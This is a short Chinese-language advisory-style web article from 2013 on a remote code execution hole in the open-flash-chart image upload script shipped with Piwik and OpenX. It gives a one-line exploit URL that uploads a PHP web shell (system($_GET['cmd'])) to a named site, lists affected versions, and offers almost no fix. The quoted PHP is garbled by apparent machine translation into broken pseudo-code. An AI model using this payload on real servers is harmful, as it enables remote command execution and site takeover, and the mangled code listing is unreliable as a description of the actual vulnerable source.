当前位置:首页 > 技术文章 > openx > Piwik和OpenX多版本存在PHP远程执行漏洞及修复
Piwik和OpenX多版本存在PHP远程执行漏洞及修复
文章来源:本站原创  浏览次数:272  发布日期:2013-04-16

本地测试成功

分析代码:

<?PHP的
 
    / *这个临时文件,我们将上传的图像文件保存默认路径* /
    $ default_path ='.. / tmp目录,上传,图像/';
 
    / *检查是否存在$ default_path变量* /
    如果(!file_exists($ default_path))
        / *如果属实,使具有写入权限的目录* /
        mkdir($ default_path,0777,真实);
 
    / *然后,创建在与上面的文件名称的目录从形式输入“名称”*文件/
    / *这个变量的状态并没有删除后再使用* /
$目的地= $ default_path。的basename($ _GET这个['名称']);
 
 
    保存您的图象: '. $destination;
 
    / *恶意代码在这里,并且攻击者能执行这个代码* /
     $jfh = fopen ($destination, ‘w’)或(“不能打开文件”);
    fwrite($ jfh,$ HTTP_RAW_POST_DATA变量);
    fclose($ jfh);
 
?>

EXP:http://www.hackqing.cn/libs/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=shell.php&amp;HTTP_RAW_POST_DATA=&lt;?system($_GET['cmd']);?&gt;

测试通过的版本 测试成功
Piwik 0.4.3
Piwik 0.4.2
Piwik 0.4.1
Piwik 0.4
Piwik 0.2.37
Piwik 0.2.36
Piwik 0.2.35
OpenX 2.8.2
OpenX 2.8.6
OpenX 2.8.5
OpenX 2.8.4
OpenX 2.8.3

修复方案:
关注官方网站及时修复


原文来自:Piwik和OpenX多版本存在PHP远程执行漏洞及修复 http://www.redyun.net/technology/90.html

红云案例Case